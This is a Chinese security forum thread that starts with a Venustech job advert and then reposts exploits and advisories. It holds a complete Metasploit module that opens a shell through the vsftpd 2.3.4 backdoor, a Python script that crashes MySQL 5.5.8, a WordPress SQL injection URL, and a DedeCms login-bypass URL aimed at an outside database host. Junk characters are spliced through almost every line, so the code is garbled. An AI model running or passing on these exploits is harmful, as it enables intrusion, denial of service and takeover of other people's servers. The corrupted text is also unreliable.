最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。
    ' l2 ]4 A8 O; F& X. R; _
    - p6 I  a! ]+ H" l" Y! }

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
      ~) e/ ~; L; q( R& ~安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.7 _2 F; v8 J1 c+ Y. [: k& B4 b
    精通C语言编程

    2.
    5 G: t9 L( Q- [) x7 R熟练使用Linux操作系统,精通 Linux下C语言编程

    3.
    # Z& t' L, v1 I  X0 ~/ \精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.
    ! P% |9 h* @* d' `, f" M熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
      ]% u+ c3 D7 u. Q  X熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.
    5 A( c; P5 S+ V负责产品的系统测试、集成测试工作

    2.
    5 X' O# H7 E( l6 L% Z* x+ l3 t8 ^负责产品用例的编写,执行、修改

    3.
    - E& m& K3 x  a' E负责产品性能的测试

    4.. N8 `/ j7 Y/ d( q& q, i; }" T$ G" ]
    负责对外项目的支持和测试工作

    岗位要求:

    1.2 v& D- f" Z, v# }9 a
    掌握基本的tcp/ip知识

    2.
    . N4 H4 N+ ~8 e/ Q; R$ \数通基础好

    3.0 T( D5 T. b) H* U* \
    对linux有一定的基础

    4." |1 d, r: }( N
    掌握数据库的搭建和使用

    5.1 U/ V( k  ]6 t" S$ k* H7 G
    至少熟悉一种编程语言C/Perl/VBS/TCL

    6.
    6 h6 I2 c) X& O9 h3 ]8 F熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7., e, Z9 [. h7 v% b' R3 v' `
    熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.! a$ Q) y2 X1 s% \
    对网络安全设备在网络中的部署有一定的认识

    9.' x2 o% v! S; U' q
    掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.8 _- o5 c/ j7 H; z% e$ l- U! r. w
    木&马检测服务、WEB漏洞扫描服务的实施

    2.
    4 t3 y& k& i1 y- |
    对服务客户的技术支持

    3.0 k5 m/ R% T) b- H4 ?  j( d
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.# F7 I9 X% V4 Z3 ^; p7 Y
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.
    . {7 `, K! b8 W  s
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################+ ]1 o) j% g7 k3 u& t; \
    " v0 v, g( l! h  x2 M9 r
    * ?6 H* ]5 B4 X4 F8 g1 Z+ N6 A

    # d$ ]4 R7 p( rrequire msf/core" o$ @+ Y6 r& n( T" z0 l4 `  T

    * P: z1 L" U1 t- Gclass Metasploit3 < Msf::Exploit::Remote
    0 k2 I4 q9 H& b& i, Q5 ~0 ORank = ExcellentRanking
    ; m2 ]) y( R* ]8 `- A& Q0 K: y* }+ j; c. A: n
    include Msf::Exploit::Remote::Tcp+ ?) Z1 x! H* @. u9 [; Z9 u' Y
      |# s2 e3 j  T$ g( `
    def initialize(info = {})
    9 e& L+ ?7 x; V. M0 I: ]' Tsuper(update_info(info
    ! Q" j: b& b$ S/ n5 N$ `Name => VSFTPD v2.3.4 Backdoor Command Execution
    9 |# I! `1 L" o* ?% w- NDescript_ion => %q{
    9 r  p2 P: |! \4 P2 q$ EThis module exploits a malicious backdoor that was added to the VSFTPD download9 ]8 t" @0 J! ^& x* `. w  H
    archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between5 y; _- Y2 e3 L! g/ e
    June 30th 2011 and July 1st 2011 according to the most recent information
    3 U1 c) c. e( R( Wavailable. This backdoor was removed on July 3rd 2011.
    + j% X1 {9 ^  S4 j9 A+ A1 f. e( E}
    8 n, z! k+ r! t$ x1 [Author => [ hdm mc ]
    / _4 j, S0 R! D$ R+ S2 e- mLicense => MSF_LICENSE
    7 x% @8 y& u4 \9 r6 `7 D+ W+ _Version => $Revision: 13099 $- ?8 E6 Q0 X) @! l4 H- u: {* ?
    References =>' p9 s. Y1 K% Y1 @" P
    [
    " Z" c* \3 d( c7 h[ URL http://pastebin.com/AetT9sS5]8 O4 a. e( C( I. i; `
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
    ' B  ^! U+ I# y- [2 L/ o]
    6 U( `8 [' |4 R* jPrivileged => true4 F: I! F" v- u0 c$ a7 N" J
    Platform => [ unix ]( n* r' ^; q( U$ e: w
    Arch => ARCH_CMD" e* B* w4 t4 M
    Payload =>
    ( o! l8 N3 k' I8 E! D' i1 H{. c& i- b0 F' B' _3 W4 [/ j
    Space => 2000
    ' N7 r, G1 s. N, J! qBadChars =>
    & Q8 l( N' s5 N& ~' RDisableNops => true
    + I% m7 g+ Q. S. A% nCompat =>
    . h. S- m8 Z2 A1 Y{$ l1 Y9 M9 Z0 }4 o; k9 x: k4 P
    PayloadType => cmd_interact
    $ e( {  y3 n+ D/ L9 L: v# nConnectionType => find( A, ]( G; V) W  g* K) q8 s- y# k) c
    }
    ' [& B, E% \9 h) h/ ~( e' z}- N& l4 e, I* d1 P& r) r
    Targets =>
    5 k1 A: T/ x: r2 i; w[: C, G) V8 N- ?
    [ Automatic { } ]
    7 l* b9 y( Z7 R/ K]
    ) H+ i" ~' S' b. s: `! _; jDisclosureDate => Jul 3 2011! A4 m% j# d# v, z
    DefaultTarget => 0))
    * ]& _$ S% r* z: Y/ g" {8 a0 J! Z4 a% W; ?! D, N, L
    register_options([ Opt::RPORT(21) ] self.class)' V; V6 L) k) [8 {' h: c$ x$ f+ t
    end4 T7 j  D+ R! p) U

    $ H1 w. X' W( ~$ w3 Kdef exploit
    ! Q1 T! t* Y5 k) k. P5 i( d) ]* b- H: a/ }) p: P
    nsock = self.connect(false {RPORT => 6200}) rescue nil+ U* Q: n' b0 |1 K. k( N
    if nsock' c' M- k: c+ Q, P& J+ k
    print_status(The port used by the backdoor bind listener is already open)
    ) n% G( k9 w+ y( r( q7 m6 E. F: F0 Khandle_backdoor(nsock)# O9 C" M* J: g2 [: H. h
    return9 h7 @% w. M5 B9 g
    end
    7 j" |; w; ~+ u% u7 d3 S/ l
    # d! H$ _- K* |4 h# Connect to the FTP service port first
    0 E( t8 Q8 |6 M# Hconnect
    & v2 f1 p% a- F  A1 Q& `0 L' {+ [: v% S$ J) H% ^- w
    banner = sock.get_once(-1 30).to_s
    3 M9 V6 K. f6 t( E, G  Wprint_status(Banner: #{banner.strip})
    # Q7 \8 G, I( l$ m8 e5 X; C
    + A0 g* Y$ e" o+ c- o; Jsock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)
    # Z- L, S% ~/ L6 u% s$ |0 A). E' L$ c3 y5 u% @6 ^4 u4 u  Q
    resp = sock.get_once(-1 30).to_s% j" i8 ~; `/ z/ F0 j' f/ N
    print_status(USER: #{resp.strip})
    : v+ y: j2 V6 T& k
    7 `6 l" S- F& x0 Kif resp =~ /^530 /
    , I% m7 V" q1 s3 k, l- {print_error(This server is configured for anonymous only and the backdoor code cannot be reached)
    ) E8 ]$ D" K# w( x0 Wdisconnect  A; [% s' M: s4 m* |( b
    return
    ! D0 p) Q3 D$ G* d+ z- [" G) Qend' L+ }3 i2 x  k- B) A3 i
    6 f. a4 Z# ?2 u& u
    if resp !~ /^331 /
    8 r* ^: P# S2 Z" [- p, Gprint_error(This server did not respond as expected: #{resp.strip})+ G( G+ s% F3 D& ]7 D% x
    disconnect
    6 Q0 K2 [/ X) Qreturn
    0 V+ [& @1 B% pend
    & k3 F+ S* ^/ H& g, f1 k4 r( a' `7 q9 h( f/ o
    sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}4 G9 {3 o- J% L
    )9 H4 ^  R3 C: [2 U( ^3 @
    7 ^7 U. r% U& V* L! e- J/ v
    # Do not bother reading the response from password just try the backdoor
    & I! m: d$ C) r) E1 {9 h1 r; b. nnsock = self.connect(false {RPORT => 6200}) rescue nil4 }  J- S. P+ L
    if nsock
    ) A  s- ?6 h. `  V# I  W1 l) i2 h- i+ H. eprint_good(Backdoor service has been spawned handling...)- D4 S) {$ B9 i/ g8 U& X9 j4 D2 M
    handle_backdoor(nsock)
    8 R7 e7 E3 n/ K4 x6 Mreturn+ k( m% ]0 F7 K% x( D8 J
    end) ^8 p: I+ D) d1 x
    / l6 M! _6 b# L( ]& ~
    disconnect
    " `( c$ `- O  C, t0 C5 T& f6 J! e) j; J$ K6 U' Z
    end
    / `3 e' A" x* ~4 D0 L0 `
    # w0 f- W4 w9 c& Ldef handle_backdoor(s)
    ; ?% y, F! D' a! C2 r. A
    3 R9 f$ H# T0 V# g9 B, Xs.put(id
    4 ]: `  s# D3 g, ]4 n( Z3 V)
    - L, Z0 t+ R( P: |: w* r
    . l" ^" d( U& ar = s.get_once(-1 5).to_s! Y2 ?9 W% q% O( Y( ^7 ?8 x' y
    if r !~ /uid=/+ ~7 k) J8 {3 C- U) T" d& B0 ]! F
    print_error(The service on port 6200 does not appear to be a shell)
    " [! s3 W! V: H. ]4 W+ adisconnect(s)
    0 d. g: e- J+ Ireturn/ l1 E6 U9 I  ~9 A6 u
    end* u* {9 u4 g5 }1 ~9 a' c7 u
    ' }+ v# y$ w+ `! ]1 J# g0 I
    print_good(UID: #{r.strip})
    9 Q. K$ y# q9 a* q* t. f% x
    3 Z) M; X) g- t2 W6 N8 G& i' Hs.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)1 [+ K# e2 H, c+ X5 p
    handler(s)/ g, R) r8 K: n4 k9 ]& ]* F& `
    end
    / X1 h1 m  A/ k" V8 C4 Y
    3 x- u. z* O. r5 I# N, e9 rend复制代码
    1 X8 d+ P% s$ Y/ ^. h# G: F9 Z1 S* W4 j3 `

    $ G. e0 u/ [2 q2 a  o$ b
    - }7 X4 c3 O1 v: N% R) f3 T9 o- V! _" I* z0 I9 G
    9 B# b, H3 s+ @6 Y1 C$ j- b
    5 K3 @& Z5 k' y7 {* z. K3 I% F

    / ^, J. R7 @% G+ D* R8 `1 ?; R* f/ A! h: E
    * T% [6 A3 ^) M! F6 `

    0 o6 S3 T# s* N# y( z
    ( {) z+ j( k1 b; {0 g& f; z" [$ J8 W" }) D6 c

    & Z* y: n( s+ M/ x& c8 P6 `
    ' v7 b0 C8 h! ~! e: U/ d% u" }1 F" N% A/ F. C" ?" r
    ) s, b0 P9 {$ \' G! b

    0 ?( M5 W# T7 y6 ]  i3 I  m1 d( H. @. s. x$ P% n) B) s4 Y+ o, _
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:0 `6 n  u7 i, {3 h/ U$ g3 @
      0 B. `0 s& ]1 E3 ^* U6 x
         
    2 h& a* {, O: ]. J1 Y  x) _- x! C  
    : U7 u' B( g9 ]( z9 n/ tSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
    : A& X4 V4 L; Iallows an authenticated user to execute arbitrary SQL commands via the id
    3 u0 z. E) u5 ?  @parameter to wp-admin/admin.php.
    ' y6 t& P" N5 q" i6 a7 o* ~9 r  
    . k" ~8 [+ m( d" U3 o6 Q" i8 H   
    5 A: l/ ^) p7 _4 w7 R  
    + u- S$ b1 R- k2. Proof of Concept:
    1 I* d8 u& K- H2 @9 P4 F  4 W* O/ h0 F5 f: J4 i4 u
       
    . `$ f- M- g, D' R  
    - Z$ O8 O  }+ B3 Z+ ihttp://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id
    7 i; x) W9 ?* P0 W8 j+ _=1 AND SLEEP(10)
    ) v2 I$ c- W3 P1 T
      [4 d9 S5 Z- h4 U9 k  
    2 n4 X3 B' m# D3 R& j! X3 J   
    & R) C3 e9 A( \& D3 d; J  ! P9 w1 g7 a$ n
    3. Solution:
    & O  s3 G1 h) C. Z  
    - t% C) r; h# N) p     
    : p, d7 H- j" j  |$ w  
    8 o1 o" ?# F- qThe plugin has been removed from WordPress. Deactivate the plug-in and wait$ H4 j) I% @8 P! O9 s5 U9 V% B4 `% [
    for a hotfix." `" _$ \6 a) v4 f, |, \/ F( z. j1 L
      7 D3 ?& }  F: c6 F# R
       
    ( X5 t/ Q. T' w/ A, M* L' Q  + Q2 {4 Y9 z8 k! m" ]4 k
    4. Reference:
    ( g0 [3 K8 j: y" Z" \  , T9 `  D9 a2 A- m
       
    8 |/ \$ P$ S" t7 l, X! x  
    " y% u% G, P- ?, r3 x9 n3 M# Qhttp://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje5 T; j( G, H2 @
    ction-sqli/9 P: e3 [5 h; i
      0 U5 n/ w7 n# c4 {. p7 G8 d3 ]
    http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    % ^6 C8 ^4 t) [
    ; K5 S" _7 S5 @4 U6 A6 |2 T
    * m* I! {' H: R& g4 c! M# J
    ! u3 K# u! @+ X3 @
    + ^3 F8 F4 f6 @! q3 E7 t
    8 \2 _5 w; K  Z3 b- a6 U- Y! {% p) r- B; N; K
    ( o2 G; P( D& J: m' j
    ( _+ g' ^) z1 B: l

    : K/ f+ [1 A" Y0 S" }
    5 V5 d, n, u3 M7 Z/ Q: D* p. @' j+ [1 ^* g3 x) a

    : E/ n4 i0 f: V& t) w$ |
    " W0 |# ~1 |( y$ q; E) l5 M
    1 |) w: S, P& X$ a+ a, a. |3 {* J  G  b! q
    3 o: r% z$ {% W

    * ?* {' P( |" A0 m8 J
    4 I3 @, t! N  Y) F9 l公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys
    . Y3 L2 b% S. o. ?4 |, x  p4 K: y " Y2 B6 C  |- j" A& }4 Y
    print "
    * c: G" O0 l, S4 Z) e8 c"
    - X1 Q. U  B# c! h( y; q" r* l- zprint "----------------------------------------------------------------"
    : _' m: `1 C  s8 ?. j( Vprint "| MySQL 5.5.8 Null Ptr (windows)                                |"
    & T3 o9 r& l! e4 ~: @print "| Level Smash the Stack                                         |"+ c% C- p4 w+ ^0 V( V
    print "----------------------------------------------------------------"
    2 B0 b; ?2 M4 @: a& W. Yprint ", S/ _1 l- C& G/ R
    ") f/ C: N7 s) b/ [+ x
    7 G. g4 p2 u# I, m
    buf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
    . I2 q! k9 ?) S7 D% |"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")/ U& h! U; d0 x3 R) M0 f2 h

    ( `6 u- \! W* q0 w' C0 ?buf2=("x11x00x00x00x03set autocommit30")8 p7 `9 Q7 N" p& v* q9 [

    ; G6 E0 O* `. U' M3 |def usage():
    6 ~3 O% d7 O, M. a9 z2 ]2 T- n( wprint "usage : ./mysql.py <victim_ip>"2 ~; F  c; ?" z: a
    print "example: ./mysql.py 192.168.1.22"
    , A0 n# O) L. _
    ) l$ ?8 m$ i. @& Q: E+ a ' ^* }' w1 s% h8 k+ n9 s9 k
    def main():6 r* y! P0 n# R
    if len(sys.argv) != 2:8 E6 }$ @  n5 r, u  g5 `
    usage()8 y# C6 x. Q$ C  \3 _. U: q
    sys.exit()3 H0 T/ w% }( U
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)- t. @' d% C$ z- F# B( h

    % x* i) E# [2 x. G8 X* L8 NHOST = sys.argv[1]2 V0 K0 Z" G: |! X& {7 F
    PORT = int(3306)0 G% r& h* Z3 h7 p. \- N
    s.connect((HOST,PORT))
    ' ~, [3 k2 Z3 v+ i. {7 A5 z1 @print "
  • Connect"
    % p3 ]* f& ]$ H0 R" {% g, N- Ts.send(buf)8 L- E9 d. Y4 B7 y- [9 W- S
    print "
  • Payload 1 sent"( p1 y" s5 Z+ K) G1 I( k: y& |
    s.send(buf2)
    ( O) z# K4 n3 S8 t" i8 ?; L/ s* Uprint "
  • Payload 2 sent1 X- |6 H; B  W% d1 v" x
    ", "
  • Run again to ensure it is down..
    ' N' o$ h% |. n; i"% m7 ?5 a- J0 ^8 ^/ J8 \: b0 Z* s
    s.close()
    8 H  B9 `) _9 L# m; @3 r 8 C2 w# Q/ \+ u. i& `# c- D
    if __name__ == "__main__":
      |! o; B' A. y* N2 R, d& ]main()3 y4 N- [: N3 U+ R' k0 y

    4 o: N# u; C- H% o. o) b4 ~# P% b
    8 w, z$ n2 o/ K: q- s) c4 {
    ! N9 ?% s# S) M7 I9 Z9 g  E5 j
    9 U* b  f; R, U' F% O% t
    4 P1 f7 j6 E/ y; f% C! M; l
    ; X4 W: g# R9 f( F/ b! W) ~+ h% ?$ N3 \; L0 ^0 C9 j
    ( o/ z: g* S! {- ]& H
    % z1 d( d. Q: T0 I  g

    5 w& c7 a+ G6 q9 S
    * L7 _2 N, n" K4 h0 F4 q% W% U, y
    4 Y* U; h- x4 e2 |5 n9 R
    ' F3 G2 i( q# y, ]5 {
    3 T6 h1 E" F1 n! H( [* }& I1 n9 r  k: \1 X; m9 a9 K1 Z9 ?4 ^
    " R6 P# C+ h& c! ?% l3 R$ j

    , M; l3 u+ @& x/ R$ Z. r1 z9 Z! s3 d" V# s
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机
    0 R. b0 P) s  |; X5 J& I
    http://www.sitedir.com.cn/video/4.swf
    7 ~1 r2 @; F! C) s2 ~3 r/ i2 h
      L# M  M) w6 E2 B! J$ E1 S" F5 E, ]! E  ]7 V0 J( \* p

    + Y  v4 o! @* j
    ! P. m6 E$ T8 O1 v0 }
    1 m9 S" A3 D; n$ |2 e
    * q( [$ V! {9 @/ [7 w% N! m/ e; z, E" U. `& P/ f8 [

    / ]* M+ E/ n+ W$ _: L' Y* p( S  n1 \& g% z
    $ x) |2 z1 O7 k0 ^" I: z

    & Y  I1 j5 J3 K0 r* u- B* W+ a" `: J) l

    6 o1 ~/ S+ p0 V: L6 {5 m. V
    $ }+ V) {8 {* c( x6 b, x( s
    0 x" {! I2 d) g. x3 U) P7 O
    # N. S) S+ @/ w, Q2 h( u5 w0 e# \: T' X; E, _7 W
    8 j: D7 h5 p% g2 [) p2 V, S
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root
    - C: O8 s) l: z
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台

    4 c0 U4 C6 x  V
    此漏洞的前提是必须得到后台路径才能实现
    0 _0 @& h0 i9 C2 O9 S+ ~: F
    官方临时解决办法:
    2 O. \. a' {/ W, J  m! b, @
    找到include/common.inc.php文件,把:
    ! M: z4 u9 R$ U& M
        foreach($_REQUEST as $_k=>$_v)  g) ?. n8 r6 O4 Q  I
        {
    9 W* ~( Q' R( Y% ~        var_dump($_k);
    6 q: c+ N$ z+ ?        if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
    , ?  S& Q8 H" ~        {
    % s% P) {9 Q6 v; s: w            exit('Request var not allow!');+ x! @1 v7 ^# H" L+ h
            }
    6 E$ z, M5 ^, Y8 V+ S    }
    # r+ f6 G7 m* M# M/ P- J
    换成:

    " B- `& T  `" T6 k+ i& o
        //检查和注册外部提交的变量
      U  z8 P0 r0 c; ~    function CheckRequest(&amp;$val) {
    + h2 c! a# x3 o$ N! `- o        if (is_array($val)) {
    5 P9 ^4 M6 m  s0 N' y4 N9 i$ K6 ?            foreach ($val as $_k=>$_v) {
    ' q& W+ U/ v: g, Q, Y& s* x7 Y                CheckRequest($_k);% B/ Z) W, I# t* d3 G) Z, t
                    CheckRequest($val[$_k]);
    5 n* M% |1 g4 O( c            }
    , d7 L% t* H4 h) Y+ `        } else  Y1 j$ m1 b5 Y- ?# f$ ^
            {6 |" U2 G; k* x2 s
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) ), S& K" T0 @7 ^7 S, C( M
                {
    8 Q+ N9 P( g0 E  h                exit('Request var not allow!');0 w0 L" U% W$ \. l8 I
                }
    ! ]6 J6 ^0 _# V. J        }
    % t& p8 N) x8 f9 z( I8 K    }
    2 \& ~( y' @: A1 i1 Q, d    CheckRequest($_REQUEST);( A: c1 o/ |0 n

    2 k1 E/ M/ q. w+ b% m9 q) ^. W% A& ?& t
      U- b& \2 o( z: p1 u6 K
    - G) @  c5 \! q. U5 z* T# d

    ( m2 P% S3 H/ `( I' B6 j
    2 ~3 r3 I6 L# D- p& l/ [; r/ O
    # C6 ^& A0 G) A- A7 ]- W* k2 B! Q8 P# x$ o( d3 o

    8 \8 G. o$ U: s$ {- d$ k
    - _1 B  j# ^. E4 I) _! q! \
    . R; V- |/ Q6 J0 a7 `2 O. E
    * ^$ j: W9 g- {$ X: `' x% [, J+ l( L2 T! F& a
    # E: K3 w  a0 S; _! Z+ R
    ; w8 J, B9 Z$ Q' f& }
    # {; C+ x/ ~6 Y! L  `: q3 u
      z  G. b# z) l  m$ M3 b
    $ e  g* u7 y+ o6 @; c9 d$ y

    7 }8 U1 E  T! f公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>; s; ^: l9 _/ o5 ]" I. |
    0 t! z/ s! c0 e0 J# Q3 x- p& R
    http://www.sitedir.com.cn/video/8.swf[/quote]
    8 ?1 a) g" M( ?- d' [' y  ^% p1 `
    " W8 }3 n$ g3 b

    0 e$ c* u. X  s6 ]3 B
    5 F; k" V' G( y+ a. A. U7 z, Q( u- c% b+ l5 {! F
    $ }/ v$ L4 x3 ~9 v6 {' \2 q

    6 o, m9 X& D& x" |. y0 U( w8 c
    6 A3 v2 \- g6 |* v
    ' A" L' j6 ^2 Q+ L' t/ ]7 _5 ?% t8 _0 J' s! S7 A
    3 y5 q( e( n6 C) e3 M& o; M  m8 P, U( n6 P
    " r% z* U4 z+ F3 r2 ~8 a, s; i

    ' Y& v  s" i1 s; ?# J3 Q# K% Z% c5 c) q: `& q
    * C0 D* _& G! S& M5 L

    7 G. V0 |; S* y, y% H
    : r& g0 M* P" J/ c( s$ {$ s5 X& U) z% l
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12

    2 P3 d0 z) ?* ^4 H. \0 O, ?  n- @4 z& o
    影响版本:
      n' P. v5 d1 z$ j+ D- IDjango 1.2.5# B7 S1 N5 D- ?
    Django 1.3 beta 1& v$ `4 S5 E2 P3 _4 Z- {
    Django 1.2.4
    / d0 P+ f9 O' ^; i% ~Django 1.2.2% ]- p1 Q" J% s, K( l
    Django 1.2
    , }/ U5 e% Y$ |: J
    漏洞描述:
    ) ^7 k# m. v5 ?
    Django是一款开放源代码的Web应用框架,由Python写成。* Z2 h) p3 w8 p! G" e! ]
    Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。
    4 \3 q' z+ _* y) Y1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。2 G6 |  g- ~) {. q2 T; E, Q* X
    2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。
    & B% \- Z$ _% [6 r* c6 r3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。! B+ h' \) K: t0 q
    4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    6 Q0 Q3 }. @* _
    细节参考: , ]- W0 ^5 D2 F) B0 \
    https://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/% r" _: D+ C" b, p1 r
    http://secunia.com/advisories/45939/
    3 s1 j. b  W& d& U. i7 T

    4 Y6 b7 `- u: g( K: I1 U
    : U' @8 c; \( o& d6 N, @4 x! o4 e) i4 U
    " n% i: W- m8 y" I& j) J
    ; v; f& I  V& `3 w6 N
    , @. S2 L6 r) ?- [7 q* m% x

    & [* \8 w* q! m+ r, A1 Z0 `1 i: x9 e$ A* C" T

    ' n+ b7 p' @0 o  k3 B) _( X4 f  N& @0 ]

    2 g2 w$ D5 F& P! c" \5 M' d% K; m4 [' ^/ A

    2 ~7 `* L4 `. m2 o5 |5 q0 l* C9 H: C) r) W4 ]1 K* E# v# K
    - x& b( P# i" [" L5 f

    ( A7 Q9 @1 q! G4 }: `
    8 b. ]+ c$ ?/ _! H% }8 R/ z/ k" M
    ; L1 t: t* t6 Z% g. |: q. N2 ]3 X% d) k
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code
    ! A6 q6 C: f& y9 k& T2 ^$ y影响版本: McAfee LinuxShield <= 1.5.1
      M4 U- Y6 ~7 B. q& t1 @远程攻击: Yes
      F; `) P* Z) E! ?, [本地溢出: Yes* A) H3 u  w' Z6 J  x. T/ e! ]
    背景阅读:
    6 K2 g0 X* j/ `0 ^===========& H( D; o# y* |2 h* g0 {3 \
    . Y1 V3 `9 w! x! t" w
    LinuxShield detects and removes viruses and other potentially unwanted
    ; B  _# l1 g7 Z" jsoftware on Linux-based systems. LinuxShield uses the powerful McAfee
    + b6 |( x  w5 v& h) I  ^/ ~scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our1 V# U# |- j, g
    anti-virus products.. u9 H- I- H1 J/ D  f
    % [8 }  m9 w7 Y; k) R0 ]* F2 L
    Although a few years ago, the Linux operating system was considered a6 f9 m. Y3 C: \" T9 J
    secure environment, it is now seeing more occurrences of software
    & u( S) C3 I0 y! j- ?# fspecifically written to attack or exploit security weaknesses in
    4 n; `2 A( j5 |7 @: Z( JLinux-based systems. Increasingly, Linux-based systems interact with) G* a" u6 M, h1 b! T3 o# t
    Windows-based computers. Although viruses written to attack Windows-' `  j  b  S- v9 E
    based systems do not directly attack Linux systems, a Linux server! d0 T' ^0 p6 K# `
    can harbor these viruses, ready to infect any client that connects to
    * o' F  `4 h: t" R' f3 \9 s$ U( L5 zit.
    & X6 ^5 c0 F( e" q# ~
    ; w% @9 X1 v. O- t7 j1 ?When installed on your Linux systems, LinuxShield provides protection
    # d4 m. E0 N: H& Q! j7 Iagainst viruses, Trojan horses, and other types of potentially
    ( N  G4 `5 D6 v& V2 m# @unwanted software.' k% v7 c2 M0 [4 y8 u7 s  n
    6 q3 x5 g+ {! L6 o. D& v
    LinuxShield scans files as they are opened and closed
    - l5 x* |& x7 O) e, a  g& n?&amp;#65533;&amp;#65533; a technique
    + W$ a# g0 R( E& Pknown as on-access scanning. LinuxShield also incorporates an
    ' t! a- v: }$ D2 v9 kon-demand scanner that enables you to scan any directory or file in
    # f& h) V2 n  S& R1 P5 \  Lyour host at any time.) L1 ?$ e8 v$ o7 ~- i9 [( @& }& |
    3 S2 m3 n+ W: X' ^5 Y9 J; d
    When kept up-to-date with the latest virus-definition (DAT) files,( R$ x* C5 O. U* n% f- c
    LinuxShield is an important part of your network security. We2 W0 S- j. _: U0 H- c8 G: h7 {
    recommend that you set up an anti-virus security policy for your
    4 O9 E: x: J0 `* Bnetwork, incorporating as many protective measures as possible.
    % y$ Y$ D; Q% |* U
    : M3 ]# F  [" r* ZLinuxShield uses a web-browser interface, and a large number of
